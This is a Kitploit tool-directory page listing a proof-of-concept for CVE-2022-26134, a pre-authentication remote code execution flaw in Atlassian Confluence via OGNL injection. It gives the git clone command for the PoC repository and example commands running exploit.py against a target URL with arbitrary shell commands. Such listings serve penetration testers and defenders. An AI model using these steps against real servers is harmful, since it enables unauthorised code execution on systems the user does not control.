Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-26134 | Kitploit
Tools/GitHubGitHub/xsxtw/cve-2022-26134
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubxsxtw/cve-2022-26134

CVE-2022-26134

View Repository
2 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-26134

CVE-2022-26134 - Confluence Pre-Auth RCE | OGNL injection

  • Download PoC script
root@kitploit:~
git clone https://github.com/crowsec-edtech/CVE-2022-26134
cd CVE-2022-26134
  • Run exploit
root@kitploit:~
USE: python3 exploit.py https://target.com CMD
Ex: python3 exploit.py https://target.com id
Ex: python3 exploit.py https://target.com 'ls -la'

Download Tool